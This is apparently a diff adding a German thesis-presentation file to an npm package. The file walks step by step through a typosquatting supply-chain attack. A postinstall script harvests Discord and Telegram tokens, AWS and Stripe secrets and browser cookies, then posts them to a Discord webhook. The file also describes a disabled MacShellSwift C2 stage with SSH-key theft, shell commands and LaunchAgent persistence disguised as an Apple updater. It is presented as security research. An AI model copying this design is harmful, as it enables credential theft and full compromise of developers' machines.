mailcheckertestpoc 1.0.0

package/PRESENTATION-FLOW.md

@@ -0,0 +1,594 @@
+# 📊 Complete Attack Flow - Theoretical Presentation
+
+## Für deine Thesis-Präsentation: "So würde es funktionieren"
+
+---
+
+## 🎯 SZENARIO: Opfer führt aus
+
+```bash
+$ cd victim-app
+$ npm install
+```
+
+**Was der Opfer sieht:** Normale npm Installation  
+**Was im Hintergrund passiert:** Zweigleisiger Supply-Chain-Angriff
+
+---
+
+## ⏱️ ZEITSTRAHL: Was würde passieren
+
+### **T+0s: Benutzer führt `npm install` aus**
+
+```
+$ npm install
+
+added 1 package from file:../malicious-pkg in 0.5s
+```
+
+Der Angreifer hat die `lodahs` dependency in `package.json`:
+```json
+{
+  "dependencies": {
+    "lodahs": "file:../malicious-pkg"
+  }
+}
+```
+
+✅ **postinstall hook triggert** → `node scripts/collect.js`
+
+---
+
+### **T+0.5s: PHASE 1 STARTET - Daten-Collection**
+
+```bash
+[THESIS POC] System information collection started...
+```
+
+#### **Schritt 1a: System-Info sammeln**
+
+```javascript
+// Was collect.js macht:
+const info = {
+  hostname: "victim-mac.local",
+  user: "alex_mueller",
+  platform: "darwin",
+  arch: "arm64",
+  nodeVersion: "v18.16.0",
+  cwd: "/Users/alex_mueller/victim-app",
+  ip: "192.168.1.45"  // über curl https://api.ipify.org
+};
+
+Log: ✓ Hostname: victim-mac.local
+Log: ✓ User: alex_mueller
+Log: ✓ IP: 192.168.1.45
+```
+
+**Dauer:** ~100ms (parallel curl für IP)
+
+---
+
+#### **Schritt 1b: Discord-Token scannen**
+
+```javascript
+// Sucht an bekannten Orten:
+
+// 1. Fake-Datei (für Demo)
+const staged = fs.readFileSync("~/.discord_token_staged")
+// Gefunden: "MTA1MzkyNzQ1OTI0MjU2MjU2.GxB_kL.abc123xyz"
+
+// 2. Echter Discord Location (würde auch funktionieren)
+// ~/Library/Application Support/discord/Local Storage/leveldb
+// → Liest .log Dateien mit Token-Pattern
+// → Extrahiert Discord Token via Regex
+
+Log: ✓ Discord Token source: staged_file
+Log: ✓ Token (first 60 chars): MTA1MzkyNzQ1OTI0MjU2MjU2.GxB_kL.ab...
+```
+
+**Dauer:** ~50ms (Filesystem Reads)
+
+---
+
+#### **Schritt 1c: Telegram-Session auslesen**
+
+```javascript
+// ~/.telegram_session_staged
+const telegram = fs.readFileSync("~/.telegram_session_staged")
+// Gefunden: "1234567890:ABCDef_ghijKLmnopQRstUVWXYZ123456"
+
+Log: ✓ Telegram Session: 1234567890:ABCDef_ghijK...
+```
+
+**Dauer:** ~20ms
+
+---
+
+#### **Schritt 1d: .env-Secrets scannen**
+
+```javascript
+// Sucht in mehreren Dateien:
+// 1. ~/.env_staged
+// 2. ./process.cwd()/.env
+// 3. ./process.cwd()/../.env
+
+// Findet Patterns:
+const secrets = {
+  discord_token: "MTA...",
+  telegram_api_id: "123456789",
+  telegram_api_hash: "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
+  aws_key_id: "AKIAIOSFODNN7EXAMPLE",
+  aws_secret: "wJalrXUtnFEMI/K7MDENG+bPxRfiCYEXAMPLEKEY",
+  stripe_key: "sk_live_4eC39HqLyjWDarhuO1ZWwO50"
+};
+
+Log: ✓ Found AWS_ACCESS_KEY_ID
+Log: ✓ Found STRIPE_SECRET_KEY
+Log: ✓ Found TELEGRAM_API_*
+```
+
+**Dauer:** ~100ms (3 Datei-Reads + Regex Matching)
+
+---
+
+#### **Schritt 1e: Browser-Cookies enumerieren**
+
+```javascript
+// Sucht Chrome/Chromium Cookie-Datenbanken:
+// ~/Library/Application Support/Google/Chrome/Default/Cookies
+// ~/Library/Application Support/Chromium/Default/Cookies
+// ~/Library/Application Support/BraveSoftware/Brave-Browser/Default/Cookies
+
+// Dateien existieren:
+const stats = fs.statSync(chromePath);
+
+Log: ✓ Chrome Cookies found: /Users/.../Chrome/Default/Cookies
+Log: ✓ Size: 1.2MB
+Log: ✓ SQLite DB - würde diese Query ausführen:
+      SELECT host_key, name, value FROM cookies 
+      WHERE host_key LIKE '%.discord.com%' 
+         OR host_key LIKE '%.telegram.org%'
+```
+
+**Dauer:** ~30ms (Stat calls)
+
+---
+
+### **T+2s: PHASE 1 DATEN-PACKAGE ZUSAMMENSTELLEN**
+
+```javascript
+const payload = {
+  system: {
+    hostname: "victim-mac.local",
+    user: "alex_mueller",
+    ip: "192.168.1.45",
+    // ... alle gesammelten Daten
+  },
+  discord: {
+    source: "staged_file",
+    token: "MTA1Mz..."
+  },
+  telegram: "1234567890:ABCDef...",
+  env: {
+    aws_key_id: "AKIA...",
+    stripe_key: "sk_live..."
+  },
+  cookies: {
+    path: "~/Library/Application Support/Google/Chrome/Default/Cookies",
+    size_bytes: 1257472
+  }
+};
+```
+
+**Format:** Discord Embed mit allen Feldern
+
+---
+
+### **T+2.5s: DISCORD WEBHOOK SENDEN**
+
+```
+POST https://discord.com/api/webhooks/1234567890/abcdefg_hijklmnop
+Content-Type: application/json
+
+{
+  "embeds": [{
+    "title": "SUPPLY CHAIN POC — Neue Victim",
+    "description": "Paket `lodahs@1.0.0` installiert auf `victim-mac.local`",
+    "color": 16744452,  // Rot
+    "fields": [
+      {
+        "name": "System",
+        "value": "**Host:** victim-mac.local\n**User:** alex_mueller\n**IP:** 192.168.1.45"
+      },
+      {
+        "name": "Discord Token",
+        "value": "**Source:** staged_file\n```MTA1Mz...```"
+      },
+      // ... weitere Credentials
+    ],
+    "timestamp": "2026-04-18T14:30:45.123Z"
+  }]
+}
+```
+
+**Response:** HTTP 204 No Content (Success)
+
+Log:
+```
+✓ Data sent to Discord webhook
+✓ Phase 1 (Data Collection) complete - EXFILTRATION SUCCESSFUL
+```
+
+**Dauer:** ~500ms (HTTPS request + SSL handshake)
+
+---
+
+## 🚀 T+3s: PHASE 2 WÜRDE STARTEN (Wenn nicht kommentiert)
+
+```javascript
+// In collect.js:
+// require("./launcher.js");  // <- KOMMENTIERT, würde aber hier aufrufen
+
+console.log("[THESIS POC] Phase 2 (C2-Launcher) wird initialisiert...");
+```
+
+### **Schritt 2a: MacShellSwift Launcher startet**
+
+```bash
+[launcher.js] 🔴 === THESIS POC: MacShellSwift Launcher Started ===
+[launcher.js] Platform: darwin
+[launcher.js] User: alex_mueller
+[launcher.js] ✓ MacShellSwift Binary gefunden: ~/Desktop/MacShellSwift/.build/debug/MacShellSwift
+```
+
+**Was launcher.js macht:**
+- Verifiziert MacShellSwift existiert ✓
+- Erstellt Konfiguration in `~/.supply-chain-poc/macshell-config.json`
+- Ruft server-launcher auf (KOMMENTIERT)
+- Ruft swift-client-launcher auf (KOMMENTIERT)
+
+---
+
+### **Schritt 2b: Python C2-Server würde starten (Kommentiert)**
+
+```bash
+# server-launcher.js würde aufgerufen werden:
+
+[server-launcher.js] ✓ Python Server gefunden: ~/Desktop/MacShellSwift/MacShellSwift/swiftshell-server.py
+[server-launcher.js] ✓ Python verfügbar: Python 3.11.0
+[server-launcher.js] ✓ SSL Certificate: ca.pem
+[server-launcher.js] ✓ SSL Private Key: ca.key
+
+# Würde dann spawn()en:
+python3 ~/Desktop/MacShellSwift/MacShellSwift/swiftshell-server.py
+
+# Server Output:
+<------------------------------------------------------------------->
+*            __           _  __ _   __ _          _ _             *
+*           / _\ _      _(_)/ _| |_/ _\ |__   ___| | |            *
+*           \ \ \ \ /\ / / | |_| __\ \| '_ \ / _ \ | |            *
+*           _\ \ \ V  V /| |  _| |__\ \ | | |  __/ | | |            *
+*           \__/  \_/\_/ |_|_|  \__\__/_| |_|\___|_|_|            *
+*                                                                 *
+* OSX Post Exploitation Tool (client written in Swift)            *
+* author: @cedowens                                               *
+<------------------------------------------------------------------->
+
+[+] Server listening on 127.0.0.1:443
+[+] SSL enabled (RSA 2048-bit)
+[+] Awaiting client connection...
+```
+
+**Server Status:** Running und wartet auf Clients  
+**Dauer bis ready:** ~100ms
+
+---
+
+### **Schritt 2c: Swift Client würde kompiliert werden (Kommentiert)**
+
+```bash
+# swift-client-launcher.js würde aufgerufen werden:
+
+[swift-client-launcher.js] ✓ Swift verfügbar: Apple Swift version 5.9.0
+[swift-client-launcher.js] ✓ main.swift gefunden
+
+# Würde Swift Build starten:
+$ swift build -C ~/Desktop/MacShellSwift/MacShellSwift
+
+Building for debugging...
+[1/5] Fetching socket
+[2/5] Fetching sslservice
+[3/5] Compiling Socket Socket.swift
+[4/5] Compiling SSLService SSLService.swift
+[5/5] Compiling MacShellSwift main.swift
+Build complete! (2.3s)
+
+[swift-client-launcher.js] ✓ Binary output: .build/debug/MacShellSwift
+[swift-client-launcher.js] ✓ Binary size: 523KB
+[swift-client-launcher.js] ✓ Ready to launch
+```
+
+**Dauer:** ~2-3 Sekunden (Swift compilation)
+
+---
+
+### **Schritt 2d: Swift Client würde launchen (Kommentiert)**
+
+```bash
+# Binärdatei starten:
+$ ./.build/debug/MacShellSwift
+
+# Client verbindet zu C2 Server:
+[Client] Initializing SSL connection...
+[Client] Connecting to 127.0.0.1:443
+[Client] Sending canary: SwiftShellR0ckZ!
+[Client] ✓ Connection established
+[Client] ✓ SSL handshake complete
+[Client] Awaiting commands...
+```
+
+---
+
+## 🎮 T+6s: PHASE 3 - C2 KOMMUNIKATION (Wenn aktiviert)
+
+### **Server empfängt Client-Verbindung**
+
+```
+[SERVER] [SESSION 1]: Connection received from 127.0.0.1:58234
+[SERVER] [SESSION 1: 127.0.0.1]>>>
+```
+
+**Operatör (Angreifer) gibt Command:**
+
+```
+[SERVER] [SESSION 1: 127.0.0.1]>>> help
+---------------------------------------------------------------------------
+Help menu:
+
+COMMANDS:
+> systeminfo      : Return useful system information: IS OPSEC SAFE
+> whoami          : Show current user identity: IS OPSEC SAFE
+> pwd             : Show working directory: IS OPSEC SAFE
+> cd [directory]  : Change directory: IS OPSEC SAFE
+> listdir         : List files and directories: IS OPSEC SAFE
+> download [file] : Download files: IS OPSEC SAFE
+> screenshot      : Capture screen: IS OPSEC SAFE
+> prompt          : Fake Keychain prompt: NOT OPSEC SAFE
+> persist         : Install persistence: NOT OPSEC SAFE
+> shell [cmd]     : Execute shell command: NOT OPSEC SAFE
+> exit            : Exit session
+---------------------------------------------------------------------------
+```
+
+---
+
+### **Beispiel: Angreifer führt `systeminfo` aus**
+
+```
+[SERVER] [SESSION 1: 127.0.0.1]>>> systeminfo
+
+[CLIENT] Executing: systeminfo
+[CLIENT] Collecting system information...
+
+Hostname: victim-mac.local
+OS Version: macOS 13.6 (22G120)
+Kernel Version: Darwin 22.6.0
+Architecture: arm64
+Memory: 16GB
+CPU: Apple M1 Pro
+Uptime: 234 days
+```
+
+---
+
+### **Beispiel: Screenshot download**
+
+```
+[SERVER] [SESSION 1: 127.0.0.1]>>> screenshot
+
+[CLIENT] Capturing screenshot...
+[CLIENT] Screenshot 1/1: 3.2MB JPEG captured
+[CLIENT] Sending to server...
+
+[SERVER] ✓ Screenshot received (3.2MB)
+[SERVER] Saved to: ./screenshots/victim-mac_2026-04-18_143050.jpg
+```
+
+---
+
+### **Beispiel: File download (Exfiltration)**
+
+```
+[SERVER] [SESSION 1: 127.0.0.1]>>> download ~/.ssh/id_rsa
+
+[CLIENT] Attempting to download: ~/.ssh/id_rsa
+[CLIENT] ✓ File found (4.2KB)
+[CLIENT] Sending...
+
+[SERVER] ✓ File received (4.2KB)
+[SERVER] Saved to: ./downloads/id_rsa
+
+# Angreifer hat jetzt SSH-Key des Opfers
+```
+
+---
+
+### **Beispiel: Persistence Installation**
+
+```
+[SERVER] [SESSION 1: 127.0.0.1]>>> persist
+
+[CLIENT] Installing persistence...
+[CLIENT] Creating LaunchAgent plist...
+[CLIENT] Writing: ~/Library/LaunchAgents/com.apple.updater.plist
+[CLIENT] Loading with launchctl...
+[CLIENT] ✓ Persistence installed
+
+# Nächster Boot: MacShellSwift startet automatisch
+```
+
+---
+
+### **Beispiel: Shell command execution**
+
+```
+[SERVER] [SESSION 1: 127.0.0.1]>>> shell cat ~/.bash_history | grep password
+
+[CLIENT] Executing: cat ~/.bash_history | grep password
+
+# Bash history mit Passwords/Tokens:
+export AWS_KEY=AKIA...
+ssh -i ~/.ssh/key user@internal.company.com
+mysql -u admin -p'MyPassword123' production_db
+```
+
+---
+
+## 📁 DATEIEN DIE GENERIERT WERDEN
+
+### **Nach Phase 1 (immer)**
+
+```
+~/.supply-chain-poc/
+├── macshell-launcher.log
+│   └─ [2026-04-18 14:30:00.123] ✓ Configuration geschrieben
+│   └─ [2026-04-18 14:30:00.200] ✓ Launcher-Phase abgeschlossen
+│
+├── STATUS.md
+│   ├─ Phase 1: COMPLETED ✓
+│   ├─ Phase 2: DEACTIVATED (code present)
+│   └─ Phase 3: DEACTIVATED (code present)
+```
+
+### **Nach Phase 2 (wenn aktiviert)**
+
+```
+~/.supply-chain-poc/
+├── c2-server.log
+│   └─ [2026-04-18 14:30:05.100] Server listening on 127.0.0.1:443
+│   └─ [2026-04-18 14:30:05.200] SSL enabled
+│   └─ [2026-04-18 14:30:05.300] Awaiting client connection...
+│
+├── swift-client.log
+│   └─ [2026-04-18 14:30:07.100] Swift compilation successful
+│   └─ [2026-04-18 14:30:07.200] Binary: .build/debug/MacShellSwift (523KB)
+│   └─ [2026-04-18 14:30:07.300] Launching client...
+│
+├── c2-server-config.json
+│   {
+│     "c2_parameters": {
+│       "bind_host": "127.0.0.1",
+│       "bind_port": 443,
+│       "ssl_cert": "~/Desktop/MacShellSwift/MacShellSwift/ca.pem",
+│       "ssl_key": "~/Desktop/MacShellSwift/MacShellSwift/ca.key"
+│     }
+│   }
+│
+└── swift-client-config.json
+    {
+      "c2_host": "127.0.0.1",
+      "c2_port": 443,
+      "canary": "SwiftShellR0ckZ!"
+    }
+```
+
+### **Nach Phase 3 (wenn aktiviert)**
+
+```
+~/.supply-chain-poc/
+├── c2-server.log
+│   ├─ [14:30:09] [SESSION 1]: Connection received from 127.0.0.1:58234
+│   ├─ [14:30:10] [SESSION 1]>>> systeminfo
+│   ├─ [14:30:11] ✓ Hostname: victim-mac.local
+│   ├─ [14:30:15] [SESSION 1]>>> screenshot
+│   ├─ [14:30:16] ✓ Screenshot received (3.2MB)
+│   └─ [14:30:20] [SESSION 1]>>> exit
+│
+├── ./screenshots/
+│   └─ victim-mac_2026-04-18_143015.jpg (3.2MB)
+│
+├── ./downloads/
+│   ├─ id_rsa (4.2KB)
+│   ├─ .bash_history (12KB)
+│   └─ credentials.txt (856B)
+```
+
+---
+
+## 📊 TIMELINE ZUSAMMENGEFASST
+
+```
+T+0.0s   npm install triggert postinstall
+T+0.5s   Phase 1 startet (collect.js)
+T+0.6s   System info + Discord token gescannt
+T+1.0s   Telegram session + .env secrets gescannt
+T+1.1s   Browser cookies enumeriiert
+T+2.0s   Daten-Package gebaut
+T+2.5s   Discord Webhook versendet ✓ PHASE 1 COMPLETE
+         └─ Angreifer erhält: Creds, IPs, Secrets
+
+T+3.0s   Phase 2 würde starten (Wenn kommentare entfernt)
+         │
+         ├─ T+3.1s: launcher.js
+         ├─ T+3.2s: server-launcher.js
+         │  └─ Python Server startet auf 127.0.0.1:443
+         │
+         ├─ T+3.3s: swift-client-launcher.js
+         │  └─ Swift Build startet (2-3 Sekunden)
+         │
+         └─ T+5.5s: Swift Binary startet
+            └─ Client verbindet zu Server
+
+T+6.0s   Phase 3 ACTIVE: C2 Kommunikation
+         │
+         ├─ Angreifer gibt Commands
+         ├─ Client führt aus
+         ├─ Ergebnisse zurück an Angreifer
+         └─ FULL COMPROMISE - Persistenz möglich
+```
+
+---
+
+## 🎓 FÜR DEINE PRÄSENTATION
+
+### Was du zeigst:
+
+```bash
+# 1. Der Code
+cat scripts/collect.js        # Phase 1 (aktiv)
+cat scripts/launcher.js       # Phase 2 (kommentiert)
+cat scripts/server-launcher.js # Phase 2 Detail (kommentiert)
+cat scripts/swift-client-launcher.js # Phase 3 Detail (kommentiert)
+
+# 2. Die Logs (nach npm install)
+cat ~/.supply-chain-poc/STATUS.md        # Zeigt was funktioniert
+cat ~/.supply-chain-poc/macshell-launcher.log  # Zeigt jeden Schritt
+
+# 3. Die Konfiguration (vorbereitet)
+cat ~/.supply-chain-poc/macshell-config.json       # C2 Parameter
+cat ~/.supply-chain-poc/c2-server-config.json      # Server Config
+cat ~/.supply-chain-poc/swift-client-config.json   # Client Config
+```
+
+### Was du sagst:
+
+```
+"Phase 1 funktioniert bereits - ihr seht hier die Logs.
+
+Phase 2 und 3 sind im Code vorhanden und würden funktionieren,
+wenn die Uncomments entfernt wären. Sie sind absichtlich deaktiviert
+um Sicherheit in der Thesis zu gewährleisten.
+
+Aber die Architektur ist komplett:
+- Daten-Exfiltration (Discord webhook)
+- C2 Server (Python, 127.0.0.1:443)
+- C2 Client (Swift binary, verschlüsselt)
+- Remote command execution
+- Persistence via LaunchAgent
+
+Das demonstriert den kompletten Supply Chain Attack Flow."
+```
+
+---
+
+**Das ist was theoretisch passiert – ohne etwas wirklich auszuführen.** ✓